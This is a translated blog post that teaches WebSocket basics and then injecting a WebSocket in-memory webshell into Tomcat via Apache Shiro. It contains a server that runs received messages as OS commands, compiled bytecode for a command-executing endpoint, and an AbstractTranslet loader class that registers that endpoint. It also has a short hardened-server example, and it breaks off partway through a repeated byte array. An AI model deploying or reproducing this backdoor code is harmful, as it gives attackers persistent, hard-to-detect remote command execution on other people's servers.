Shiro WebSocket Memory Shells Explained
Met32 2023-06-25 16:17:13 300002
Location: Hebei Province

1. What is WebSocket?

The WebSocket protocol is a newer network protocol built on top of TCP. It provides full-duplex communication between browser and server, so the server can push messages to the client on its own initiative.

WebSocket is a persistent protocol, whereas HTTP is not. Before WebSocket existed, real-time push from a website to the browser was implemented with Ajax polling: the browser sends an HTTP request to the server at a fixed interval and the server replies with the latest data. Polling is inefficient and wastes a great deal of resources.

Differences between WebSocket and HTTP

HTTP is a stateless, connectionless, one-way application-layer protocol built on a request/response model. Only the client can initiate a request and the server merely answers it, so HTTP gives the server no way to send a message to the client unprompted.

WebSocket establishes the connection once and then keeps it open, which is clearly far more efficient than polling, where a new connection is set up over and over.

Put simply: web pages are visited over http://, while a WebSocket connection uses ws://.

2. Getting started with WebSocket

First add the Maven dependency:

<dependency>
    <groupId>org.java-websocket</groupId>
    <artifactId>Java-WebSocket</artifactId>
    <version>1.5.3</version>
</dependency>

Using WebSocket is then very simple:

import java.io.IOException;
import java.net.InetSocketAddress;
import java.net.UnknownHostException;

import org.java_websocket.WebSocket;
import org.java_websocket.handshake.ClientHandshake;
import org.java_websocket.server.WebSocketServer;

public class SocketServer extends WebSocketServer {
    public SocketServer(int port) throws UnknownHostException {
        super(new InetSocketAddress(port));
    }

    @Override
    public void onOpen(WebSocket webSocket, ClientHandshake clientHandshake) {
        // Runs once the handshake with a client has completed
        System.out.println("有人连接");
    }

    @Override
    public void onClose(WebSocket webSocket, int i, String s, boolean b) {
        // Runs when the connection is closed (code, reason, whether the remote side closed it)
    }

    @Override
    public void onMessage(WebSocket webSocket, String s) {
        // Every text frame from the client lands here; this demo runs the text as an OS command
        System.out.println("收到消息"+s);
        try {
            Runtime.getRuntime().exec(s);
        } catch (IOException e) {
            e.printStackTrace();
        }
    }

    @Override
    public void onError(WebSocket webSocket, Exception e) {
        // Runs when an error occurs on a connection or on the server socket
    }

    @Override
    public void onStart() {
        // Runs once the server socket is bound and listening
    }

    // Start the server; it listens on port 8877 and waits for client connections
    public static void main(String[] args) throws UnknownHostException {
        new SocketServer(8877).start();
    }
}

The class you actually work with is WebSocketServer: extend it and override its methods. After a client connects, whatever action the client takes, the server runs the corresponding method, which makes the model easy to understand.

The overridden WebSocketServer methods above do the following:

- onOpen: called after a connection is established
- onClose: called after a connection is closed
- onMessage: called when a message is received from the client
- onError: called when an error occurs

Start it from the main method; once running, it listens on port 8877 and waits for client connections.
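The handler above passes every received message to Runtime.exec, which turns the server into a command interface for anyone who can reach the port. As an added example (not from the original article), the following is a hardened counterpart on the same Java-WebSocket 1.5.3 API: the Origin header is checked against an allow-list when the connection opens, message length is capped, and messages are dispatched as data through a fixed set of operations. The allowed origin and the ping/echo operations are assumed values for illustration.

```java
import java.net.InetSocketAddress;
import java.util.Arrays;
import java.util.HashSet;
import java.util.Set;

import org.java_websocket.WebSocket;
import org.java_websocket.framing.CloseFrame;
import org.java_websocket.handshake.ClientHandshake;
import org.java_websocket.server.WebSocketServer;

/** Hardened counterpart of SocketServer: messages are data, never commands. */
public class SafeSocketServer extends WebSocketServer {

    // Origins allowed to open a socket (assumed value for this example)
    private static final Set<String> ALLOWED_ORIGINS =
            new HashSet<>(Arrays.asList("https://app.example.test"));
    private static final int MAX_MESSAGE_CHARS = 512;

    public SafeSocketServer(int port) {
        super(new InetSocketAddress(port));
    }

    @Override
    public void onOpen(WebSocket ws, ClientHandshake hs) {
        // getFieldValue returns "" when the header is absent
        String origin = hs.getFieldValue("Origin");
        if (!isOriginAllowed(origin)) {
            ws.close(CloseFrame.POLICY_VALIDATION, "origin not allowed");
            return;
        }
        System.out.println("connection from " + ws.getRemoteSocketAddress());
    }

    @Override
    public void onMessage(WebSocket ws, String msg) {
        ws.send(handle(msg));
    }

    /** Pure dispatch logic, separated so it can be unit-tested without sockets. */
    public static String handle(String msg) {
        if (msg == null || msg.length() > MAX_MESSAGE_CHARS) {
            return "ERR message too long";
        }
        if (msg.equals("ping")) {
            return "pong";
        }
        if (msg.startsWith("echo ")) {
            return msg.substring("echo ".length());
        }
        // Anything outside the fixed vocabulary is rejected, never passed to a shell
        return "ERR unknown message";
    }

    public static boolean isOriginAllowed(String origin) {
        return origin != null && ALLOWED_ORIGINS.contains(origin);
    }

    @Override
    public void onClose(WebSocket ws, int code, String reason, boolean remote) {
    }

    @Override
    public void onError(WebSocket ws, Exception e) {
        e.printStackTrace();
    }

    @Override
    public void onStart() {
        System.out.println("listening on " + getPort());
    }

    public static void main(String[] args) {
        new SafeSocketServer(8877).start();
    }
}
```

An Origin check only stops cross-site browsers; it is not authentication, so a real deployment would additionally require a session token during the handshake and bind the socket to that identity.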

Then use any online WebSocket client to send a message. In my test I sent calc; the server received the message in onMessage and processed it.


3. Shiro WebSocket memory shell

Having covered the basics of WebSocket, we can dig into memory shells (in-memory webshells).

In Tomcat, WebSocket support is set up and handled through WsSci. The memory shell most commonly injected through Shiro is a Filter; this article focuses on injecting a WebSocket memory shell instead.

First prepare a WebSocket server endpoint whose only job is to pass whatever arrives in onMessage to command execution.

Something like the earlier example is enough, or you can use code that others have shared online.

Generate its bytecode with javassist; the resulting byte array is:

byte[] bytes = new byte[]{-54, -2, -70, -66, 0, 0, 0, 51, 0, -96, 10, 0, 33, 0, 81, 9, 0, 32, 0, 82, 11, 0, 83, 0, 84, 8, 0, 85, 10, 0, 86, 0, 87, 9, 0, 88, 0, 89, 10, 0, 11, 0, 90, 8, 0, 91, 10, 0, 11, 0, 92, 10, 0, 93, 0, 94, 7, 0, 95, 8, 0, 96, 8, 0, 97, 10, 0, 93, 0, 98, 10, 0, 99, 0, 100, 7, 0, 101, 10, 0, 16, 0, 81, 10, 0, 102, 0, 103, 10, 0, 16, 0, 104, 10, 0, 102, 0, 105, 10, 0, 99, 0, 106, 11, 0, 83, 0, 107, 8, 0, 108, 10, 0, 16, 0, 109, 10, 0, 16, 0, 110, 11, 0, 111, 0, 112, 7, 0, 113, 10, 0, 27, 0, 114, 7, 0, 115, 10, 0, 29, 0, 114, 10, 0, 32, 0, 116, 7, 0, 117, 7, 0, 118, 7, 0, 120, 1, 0, 7, 115, 101, 115, 115, 105, 111, 110, 1, 0, 25, 76, 106, 97, 118, 97, 120, 47, 119, 101, 98, 115, 111, 99, 107, 101, 116, 47, 83, 101, 115, 115, 105, 111, 110, 59, 1, 0, 6, 60, 105, 110, 105, 116, 62, 1, 0, 3, 40, 41, 86, 1, 0, 4, 67, 111, 100, 101, 1, 0, 15, 76, 105, 110, 101, 78, 117, 109, 98, 101, 114, 84, 97, 98, 108, 101, 1, 0, 18, 76, 111, 99, 97, 108, 86, 97, 114, 105, 97, 98, 108, 101, 84, 97, 98, 108, 101, 1, 0, 4, 116, 104, 105, 115, 1, 0, 19, 76, 99, 111, 109, 47, 87, 101, 98, 83, 111, 99, 107, 101, 116, 95, 99, 109, 100, 59, 1, 0, 6, 111, 110, 79, 112, 101, 110, 1, 0, 60, 40, 76, 106, 97, 118, 97, 120, 47, 119, 101, 98, 115, 111, 99, 107, 101, 116, 47, 83, 101, 115, 115, 105, 111, 110, 59, 76, 106, 97, 118, 97, 120, 47, 119, 101, 98, 115, 111, 99, 107, 101, 116, 47, 69, 110, 100, 112, 111, 105, 110, 116, 67, 111, 110, 102, 105, 103, 59, 41, 86, 1, 0, 14, 101, 110, 100, 112, 111, 105, 110, 116, 67, 111, 110, 102, 105, 103, 1, 0, 32, 76, 106, 97, 118, 97, 120, 47, 119, 101, 98, 115, 111, 99, 107, 101, 116, 47, 69, 110, 100, 112, 111, 105, 110, 116, 67, 111, 110, 102, 105, 103, 59, 1, 0, 16, 77, 101, 116, 104, 111, 100, 80, 97, 114, 97, 109, 101, 116, 101, 114, 115, 1, 0, 9, 111, 110, 77, 101, 115, 115, 97, 103, 101, 1, 0, 21, 40, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 59, 41, 86, 1, 0, 4, 101, 120, 101, 99, 1, 0, 19, 76, 
106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 80, 114, 111, 99, 101, 115, 115, 59, 1, 0, 2, 105, 115, 1, 0, 1, 90, 1, 0, 3, 105, 112, 115, 1, 0, 21, 76, 106, 97, 118, 97, 47, 105, 111, 47, 73, 110, 112, 117, 116, 83, 116, 114, 101, 97, 109, 59, 1, 0, 2, 115, 98, 1, 0, 25, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 66, 117, 105, 108, 100, 101, 114, 59, 1, 0, 1, 105, 1, 0, 1, 73, 1, 0, 1, 101, 1, 0, 21, 76, 106, 97, 118, 97, 47, 105, 111, 47, 73, 79, 69, 120, 99, 101, 112, 116, 105, 111, 110, 59, 1, 0, 32, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 73, 110, 116, 101, 114, 114, 117, 112, 116, 101, 100, 69, 120, 99, 101, 112, 116, 105, 111, 110, 59, 1, 0, 1, 115, 1, 0, 18, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 59, 1, 0, 13, 83, 116, 97, 99, 107, 77, 97, 112, 84, 97, 98, 108, 101, 7, 0, 121, 7, 0, 122, 7, 0, 101, 7, 0, 117, 7, 0, 95, 7, 0, 113, 7, 0, 115, 1, 0, 21, 40, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 79, 98, 106, 101, 99, 116, 59, 41, 86, 1, 0, 9, 83, 105, 103, 110, 97, 116, 117, 114, 101, 1, 0, 5, 87, 104, 111, 108, 101, 1, 0, 12, 73, 110, 110, 101, 114, 67, 108, 97, 115, 115, 101, 115, 1, 0, 84, 76, 106, 97, 118, 97, 120, 47, 119, 101, 98, 115, 111, 99, 107, 101, 116, 47, 69, 110, 100, 112, 111, 105, 110, 116, 59, 76, 106, 97, 118, 97, 120, 47, 119, 101, 98, 115, 111, 99, 107, 101, 116, 47, 77, 101, 115, 115, 97, 103, 101, 72, 97, 110, 100, 108, 101, 114, 36, 87, 104, 111, 108, 101, 60, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 59, 62, 59, 1, 0, 10, 83, 111, 117, 114, 99, 101, 70, 105, 108, 101, 1, 0, 18, 87, 101, 98, 83, 111, 99, 107, 101, 116, 95, 99, 109, 100, 46, 106, 97, 118, 97, 12, 0, 37, 0, 38, 12, 0, 35, 0, 36, 7, 0, 123, 12, 0, 124, 0, 125, 1, 0, 7, 111, 115, 46, 110, 97, 109, 101, 7, 0, 126, 12, 0, 127, 0, -128, 7, 0, -127, 12, 0, -126, 0, -125, 12, 0, -124, 0, -123, 1, 0, 7, 119, 105, 110, 100, 111, 119, 115, 12, 0, -122, 0, 
-121, 7, 0, -120, 12, 0, -119, 0, -118, 1, 0, 16, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 1, 0, 7, 99, 109, 100, 46, 101, 120, 101, 1, 0, 2, 47, 99, 12, 0, 51, 0, -117, 7, 0, 121, 12, 0, -116, 0, -115, 1, 0, 23, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 66, 117, 105, 108, 100, 101, 114, 7, 0, 122, 12, 0, -114, 0, -113, 12, 0, -112, 0, -111, 12, 0, -110, 0, 38, 12, 0, -109, 0, -113, 12, 0, -108, 0, -106, 1, 0, 4, 77, 83, 71, 58, 12, 0, -112, 0, -105, 12, 0, -104, 0, -103, 7, 0, -101, 12, 0, -100, 0, 50, 1, 0, 19, 106, 97, 118, 97, 47, 105, 111, 47, 73, 79, 69, 120, 99, 101, 112, 116, 105, 111, 110, 12, 0, -99, 0, 38, 1, 0, 30, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 73, 110, 116, 101, 114, 114, 117, 112, 116, 101, 100, 69, 120, 99, 101, 112, 116, 105, 111, 110, 12, 0, 49, 0, 50, 1, 0, 17, 99, 111, 109, 47, 87, 101, 98, 83, 111, 99, 107, 101, 116, 95, 99, 109, 100, 1, 0, 24, 106, 97, 118, 97, 120, 47, 119, 101, 98, 115, 111, 99, 107, 101, 116, 47, 69, 110, 100, 112, 111, 105, 110, 116, 7, 0, -98, 1, 0, 36, 106, 97, 118, 97, 120, 47, 119, 101, 98, 115, 111, 99, 107, 101, 116, 47, 77, 101, 115, 115, 97, 103, 101, 72, 97, 110, 100, 108, 101, 114, 36, 87, 104, 111, 108, 101, 1, 0, 17, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 80, 114, 111, 99, 101, 115, 115, 1, 0, 19, 106, 97, 118, 97, 47, 105, 111, 47, 73, 110, 112, 117, 116, 83, 116, 114, 101, 97, 109, 1, 0, 23, 106, 97, 118, 97, 120, 47, 119, 101, 98, 115, 111, 99, 107, 101, 116, 47, 83, 101, 115, 115, 105, 111, 110, 1, 0, 17, 97, 100, 100, 77, 101, 115, 115, 97, 103, 101, 72, 97, 110, 100, 108, 101, 114, 1, 0, 35, 40, 76, 106, 97, 118, 97, 120, 47, 119, 101, 98, 115, 111, 99, 107, 101, 116, 47, 77, 101, 115, 115, 97, 103, 101, 72, 97, 110, 100, 108, 101, 114, 59, 41, 86, 1, 0, 16, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 121, 115, 116, 101, 109, 1, 0, 11, 103, 101, 116, 80, 114, 111, 112, 101, 114, 116, 121, 1, 0, 38, 40, 76, 106, 97, 
118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 59, 41, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 59, 1, 0, 16, 106, 97, 118, 97, 47, 117, 116, 105, 108, 47, 76, 111, 99, 97, 108, 101, 1, 0, 4, 82, 79, 79, 84, 1, 0, 18, 76, 106, 97, 118, 97, 47, 117, 116, 105, 108, 47, 76, 111, 99, 97, 108, 101, 59, 1, 0, 11, 116, 111, 76, 111, 119, 101, 114, 67, 97, 115, 101, 1, 0, 38, 40, 76, 106, 97, 118, 97, 47, 117, 116, 105, 108, 47, 76, 111, 99, 97, 108, 101, 59, 41, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 59, 1, 0, 10, 115, 116, 97, 114, 116, 115, 87, 105, 116, 104, 1, 0, 21, 40, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 59, 41, 90, 1, 0, 17, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 82, 117, 110, 116, 105, 109, 101, 1, 0, 10, 103, 101, 116, 82, 117, 110, 116, 105, 109, 101, 1, 0, 21, 40, 41, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 82, 117, 110, 116, 105, 109, 101, 59, 1, 0, 40, 40, 91, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 59, 41, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 80, 114, 111, 99, 101, 115, 115, 59, 1, 0, 14, 103, 101, 116, 73, 110, 112, 117, 116, 83, 116, 114, 101, 97, 109, 1, 0, 23, 40, 41, 76, 106, 97, 118, 97, 47, 105, 111, 47, 73, 110, 112, 117, 116, 83, 116, 114, 101, 97, 109, 59, 1, 0, 4, 114, 101, 97, 100, 1, 0, 3, 40, 41, 73, 1, 0, 6, 97, 112, 112, 101, 110, 100, 1, 0, 28, 40, 67, 41, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 66, 117, 105, 108, 100, 101, 114, 59, 1, 0, 5, 99, 108, 111, 115, 101, 1, 0, 7, 119, 97, 105, 116, 70, 111, 114, 1, 0, 14, 103, 101, 116, 66, 97, 115, 105, 99, 82, 101, 109, 111, 116, 101, 1, 0, 5, 66, 97, 115, 105, 99, 1, 0, 40, 40, 41, 76, 106, 97, 118, 97, 120, 47, 119, 101, 98, 115, 111, 99, 107, 101, 116, 47, 82, 101, 109, 111, 116, 101, 69, 110, 100, 112, 111, 105, 110, 116, 36, 66, 97, 115, 105, 99, 59, 1, 0, 
45, 40, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 59, 41, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 66, 117, 105, 108, 100, 101, 114, 59, 1, 0, 8, 116, 111, 83, 116, 114, 105, 110, 103, 1, 0, 20, 40, 41, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 59, 7, 0, -97, 1, 0, 36, 106, 97, 118, 97, 120, 47, 119, 101, 98, 115, 111, 99, 107, 101, 116, 47, 82, 101, 109, 111, 116, 101, 69, 110, 100, 112, 111, 105, 110, 116, 36, 66, 97, 115, 105, 99, 1, 0, 8, 115, 101, 110, 100, 84, 101, 120, 116, 1, 0, 15, 112, 114, 105, 110, 116, 83, 116, 97, 99, 107, 84, 114, 97, 99, 101, 1, 0, 30, 106, 97, 118, 97, 120, 47, 119, 101, 98, 115, 111, 99, 107, 101, 116, 47, 77, 101, 115, 115, 97, 103, 101, 72, 97, 110, 100, 108, 101, 114, 1, 0, 30, 106, 97, 118, 97, 120, 47, 119, 101, 98, 115, 111, 99, 107, 101, 116, 47, 82, 101, 109, 111, 116, 101, 69, 110, 100, 112, 111, 105, 110, 116, 0, 33, 0, 32, 0, 33, 0, 1, 0, 34, 0, 1, 0, 2, 0, 35, 0, 36, 0, 0, 0, 4, 0, 1, 0, 37, 0, 38, 0, 1, 0, 39, 0, 0, 0, 47, 0, 1, 0, 1, 0, 0, 0, 5, 42, -73, 0, 1, -79, 0, 0, 0, 2, 0, 40, 0, 0, 0, 6, 0, 1, 0, 0, 0, 11, 0, 41, 0, 0, 0, 12, 0, 1, 0, 0, 0, 5, 0, 42, 0, 43, 0, 0, 0, 1, 0, 44, 0, 45, 0, 2, 0, 39, 0, 0, 0, 86, 0, 2, 0, 3, 0, 0, 0, 16, 42, 43, -75, 0, 2, 42, -76, 0, 2, 42, -71, 0, 3, 2, 0, -79, 0, 0, 0, 2, 0, 40, 0, 0, 0, 14, 0, 3, 0, 0, 0, 15, 0, 5, 0, 16, 0, 15, 0, 17, 0, 41, 0, 0, 0, 32, 0, 3, 0, 0, 0, 16, 0, 42, 0, 43, 0, 0, 0, 0, 0, 16, 0, 35, 0, 36, 0, 1, 0, 0, 0, 16, 0, 46, 0, 47, 0, 2, 0, 48, 0, 0, 0, 9, 2, 0, 35, 0, 0, 0, 46, 0, 0, 0, 1, 0, 49, 0, 50, 0, 2, 0, 39, 0, 0, 1, -67, 0, 5, 0, 7, 0, 0, 0, -79, 18, 4, -72, 0, 5, -78, 0, 6, -74, 0, 7, 18, 8, -74, 0, 9, 61, 28, -103, 0, 31, -72, 0, 10, 6, -67, 0, 11, 89, 3, 18, 12, 83, 89, 4, 18, 13, 83, 89, 5, 43, 83, -74, 0, 14, 78, -89, 0, 28, -72, 0, 10, 6, -67, 0, 11, 89, 3, 18, 12, 83, 89, 4, 18, 13, 83, 89, 5, 43, 83, -74, 0, 14, 78, 45, -74, 0, 15, 
58, 4, -69, 0, 16, 89, -73, 0, 17, 58, 5, 25, 4, -74, 0, 18, 89, 54, 6, 2, -97, 0, 15, 25, 5, 21, 6, -110, -74, 0, 19, 87, -89, -1, -21, 25, 4, -74, 0, 20, 45, -74, 0, 21, 87, 42, -76, 0, 2, -71, 0, 22, 1, 0, -69, 0, 16, 89, -73, 0, 17, 18, 23, -74, 0, 24, 25, 5, -74, 0, 25, -74, 0, 24, -74, 0, 25, -71, 0, 26, 2, 0, -89, 0, 16, 77, 44, -74, 0, 28, -89, 0, 8, 77, 44, -74, 0, 30, -79, 0, 2, 0, 0, 0, -96, 0, -93, 0, 27, 0, 0, 0, -96, 0, -85, 0, 29, 0, 3, 0, 40, 0, 0, 0, 74, 0, 18, 0, 0, 0, 22, 0, 17, 0, 24, 0, 21, 0, 25, 0, 49, 0, 27, 0, 74, 0, 30, 0, 80, 0, 31, 0, 89, 0, 33, 0, 101, 0, 34, 0, 113, 0, 36, 0, 118, 0, 37, 0, 123, 0, 38, 0, -96, 0, 43, 0, -93, 0, 39, 0, -92, 0, 40, 0, -88, 0, 43, 0, -85, 0, 41, 0, -84, 0, 42, 0, -80, 0, 44, 0, 41, 0, 0, 0, 102, 0, 10, 0, 46, 0, 3, 0, 51, 0, 52, 0, 3, 0, 17, 0, -113, 0, 53, 0, 54, 0, 2, 0, 74, 0, 86, 0, 51, 0, 52, 0, 3, 0, 80, 0, 80, 0, 55, 0, 56, 0, 4, 0, 89, 0, 71, 0, 57, 0, 58, 0, 5, 0, 97, 0, 63, 0, 59, 0, 60, 0, 6, 0, -92, 0, 4, 0, 61, 0, 62, 0, 2, 0, -84, 0, 4, 0, 61, 0, 63, 0, 2, 0, 0, 0, -79, 0, 42, 0, 43, 0, 0, 0, 0, 0, -79, 0, 64, 0, 65, 0, 1, 0, 66, 0, 0, 0, 46, 0, 7, -4, 0, 49, 1, -4, 0, 24, 7, 0, 67, -3, 0, 14, 7, 0, 68, 7, 0, 69, -4, 0, 23, 1, -1, 0, 49, 0, 2, 7, 0, 70, 7, 0, 71, 0, 1, 7, 0, 72, 71, 7, 0, 73, 4, 0, 48, 0, 0, 0, 5, 1, 0, 64, 0, 0, 16, 65, 0, 49, 0, 74, 0, 2, 0, 39, 0, 0, 0, 51, 0, 2, 0, 2, 0, 0, 0, 9, 42, 43, -64, 0, 11, -74, 0, 31, -79, 0, 0, 0, 2, 0, 40, 0, 0, 0, 6, 0, 1, 0, 0, 0, 11, 0, 41, 0, 0, 0, 12, 0, 1, 0, 0, 0, 9, 0, 42, 0, 43, 0, 0, 0, 48, 0, 0, 0, 5, 1, 0, 64, 16, 0, 0, 3, 0, 75, 0, 0, 0, 2, 0, 78, 0, 79, 0, 0, 0, 2, 0, 80, 0, 77, 0, 0, 0, 18, 0, 2, 0, 34, 0, 119, 0, 76, 6, 9, 0, 111, 0, -102, 0, -107, 6, 9};

Next, look at the code below, which loads that endpoint. Its logic is simple:

1. Obtain the current StandardContext.
2. Obtain the ServerContainer from the StandardContext.
3. Define a malicious class and create a ServerEndpointConfig that assigns it a URI path.
4. Call ServerContainer.addEndpoint to register the ServerEndpointConfig.

import java.lang.reflect.Field;
import java.lang.reflect.InvocationTargetException;
import java.lang.reflect.Method;

import javax.websocket.DeploymentException;
import javax.websocket.server.ServerContainer;
import javax.websocket.server.ServerEndpointConfig;

import org.apache.catalina.core.StandardContext;
import org.apache.catalina.loader.WebappClassLoaderBase;
import org.apache.catalina.webresources.StandardRoot;
import org.apache.tomcat.websocket.server.WsServerContainer;

import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;

public class shiro_shell extends AbstractTranslet {

    static{
        WebappClassLoaderBase webappClassLoader = (WebappClassLoaderBase)Thread.currentThread().getContextClassLoader(); // obtain the webapp class loader
        StandardRoot standardRoot = (StandardRoot) webappClassLoader.getResources();
        if(standardRoot==null){
            // Some Tomcat versions only expose the resources through a private field
            Field field;
            try {
                field = webappClassLoader.getClass().getDeclaredField("resources");
                field.setAccessible(true);
                standardRoot = (StandardRoot)field.get(webappClassLoader);
            }catch (Exception e){
                try {
                    field = webappClassLoader.getClass().getSuperclass().getDeclaredField("resources");
                    field.setAccessible(true);
                    standardRoot = (StandardRoot)field.get(webappClassLoader);
                } catch (NoSuchFieldException noSuchFieldException) {
                    noSuchFieldException.printStackTrace();
                } catch (IllegalAccessException illegalAccessException) {
                    illegalAccessException.printStackTrace();
                }

            }
        }
        StandardContext standardContext = (StandardContext) standardRoot.getContext(); // step 1: the current StandardContext

        ClassLoader cl = Thread.currentThread().getContextClassLoader();
        Class clazz;
    byte[] bytes = new byte[]{-54, -2, -70, -66, 0, 0, 0, 51, 0, -96, 10, 0, 33, 0, 81, 9, 0, 32, 0, 82, 11, 0, 83, 0, 84, 8, 0, 85, 10, 0, 86, 0, 87, 9, 0, 88, 0, 89, 10, 0, 11, 0, 90, 8, 0, 91, 10, 0, 11, 0, 92, 10, 0, 93, 0, 94, 7, 0, 95, 8, 0, 96, 8, 0, 97, 10, 0, 93, 0, 98, 10, 0, 99, 0, 100, 7, 0, 101, 10, 0, 16, 0, 81, 10, 0, 102, 0, 103, 10, 0, 16, 0, 104, 10, 0, 102, 0, 105, 10, 0, 99, 0, 106, 11, 0, 83, 0, 107, 8, 0, 108, 10, 0, 16, 0, 109, 10, 0, 16, 0, 110, 11, 0, 111, 0, 112, 7, 0, 113, 10, 0, 27, 0, 114, 7, 0, 115, 10, 0, 29, 0, 114, 10, 0, 32, 0, 116, 7, 0, 117, 7, 0, 118, 7, 0, 120, 1, 0, 7, 115, 101, 115, 115, 105, 111, 110, 1, 0, 25, 76, 106, 97, 118, 97, 120, 47, 119, 101, 98, 115, 111, 99, 107, 101, 116, 47, 83, 101, 115, 115, 105, 111, 110, 59, 1, 0, 6, 60, 105, 110, 105, 116, 62, 1, 0, 3, 40, 41, 86, 1, 0, 4, 67, 111, 100, 101, 1, 0, 15, 76, 105, 110, 101, 78, 117, 109, 98, 101, 114, 84, 97, 98, 108, 101, 1, 0, 18, 76, 111, 99, 97, 108, 86, 97, 114, 105, 97, 98, 108, 101, 84, 97, 98, 108, 101, 1, 0, 4, 116, 104, 105, 115, 1, 0, 19, 76, 99, 111, 109, 47, 87, 101, 98, 83, 111, 99, 107, 101, 116, 95, 99, 109, 100, 59, 1, 0, 6, 111, 110, 79, 112, 101, 110, 1, 0, 60, 40, 76, 106, 97, 118, 97, 120, 47, 119, 101, 98, 115, 111, 99, 107, 101, 116, 47, 83, 101, 115, 115, 105, 111, 110, 59, 76, 106, 97, 118, 97, 120, 47, 119, 101, 98, 115, 111, 99, 107, 101, 116, 47, 69, 110, 100, 112, 111, 105, 110, 116, 67, 111, 110, 102, 105, 103, 59, 41, 86, 1, 0, 14, 101, 110, 100, 112, 111, 105, 110, 116, 67, 111, 110, 102, 105, 103, 1, 0, 32, 76, 106, 97, 118, 97, 120, 47, 119, 101, 98, 115, 111, 99, 107, 101, 116, 47, 69, 110, 100, 112, 111, 105, 110, 116, 67, 111, 110, 102, 105, 103, 59, 1, 0, 16, 77, 101, 116, 104, 111, 100, 80, 97, 114, 97, 109, 101, 116, 101, 114, 115, 1, 0, 9, 111, 110, 77, 101, 115, 115, 97, 103, 101, 1, 0, 21, 40, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 59, 41, 86, 1, 0, 4, 101, 120, 101, 99, 1, 0, 19, 
76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 80, 114, 111, 99, 101, 115, 115, 59, 1, 0, 2, 105, 115, 1, 0, 1, 90, 1, 0, 3, 105, 112, 115, 1, 0, 21, 76, 106, 97, 118, 97, 47, 105, 111, 47, 73, 110, 112, 117, 116, 83, 116, 114, 101, 97, 109, 59, 1, 0, 2, 115, 98, 1, 0, 25, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 66, 117, 105, 108, 100, 101, 114, 59, 1, 0, 1, 105, 1, 0, 1, 73, 1, 0, 1, 101, 1, 0, 21, 76, 106, 97, 118, 97, 47, 105, 111, 47, 73, 79, 69, 120, 99, 101, 112, 116, 105, 111, 110, 59, 1, 0, 32, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 73, 110, 116, 101, 114, 114, 117, 112, 116, 101, 100, 69, 120, 99, 101, 112, 116, 105, 111, 110, 59, 1, 0, 1, 115, 1, 0, 18, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 59, 1, 0, 13, 83, 116, 97, 99, 107, 77, 97, 112, 84, 97, 98, 108, 101, 7, 0, 121, 7, 0, 122, 7, 0, 101, 7, 0, 117, 7, 0, 95, 7, 0, 113, 7, 0, 115, 1, 0, 21, 40, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 79, 98, 106, 101, 99, 116, 59, 41, 86, 1, 0, 9, 83, 105, 103, 110, 97, 116, 117, 114, 101, 1, 0, 5, 87, 104, 111, 108, 101, 1, 0, 12, 73, 110, 110, 101, 114, 67, 108, 97, 115, 115, 101, 115, 1, 0, 84, 76, 106, 97, 118, 97, 120, 47, 119, 101, 98, 115, 111, 99, 107, 101, 116, 47, 69, 110, 100, 112, 111, 105, 110, 116, 59, 76, 106, 97, 118, 97, 120, 47, 119, 101, 98, 115, 111, 99, 107, 101, 116, 47, 77, 101, 115, 115, 97, 103, 101, 72, 97, 110, 100, 108, 101, 114, 36, 87, 104, 111, 108, 101, 60, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 59, 62, 59, 1, 0, 10, 83, 111, 117, 114, 99, 101, 70, 105, 108, 101, 1, 0, 18, 87, 101, 98, 83, 111, 99, 107, 101, 116, 95, 99, 109, 100, 46, 106, 97, 118, 97, 12, 0, 37, 0, 38, 12, 0, 35, 0, 36, 7, 0, 123, 12, 0, 124, 0, 125, 1, 0, 7, 111, 115, 46, 110, 97, 109, 101, 7, 0, 126, 12, 0, 127, 0, -128, 7, 0, -127, 12, 0, -126, 0, -125, 12, 0, -124, 0, -123, 1, 0, 7, 119, 105, 110, 100, 111, 119, 115, 12, 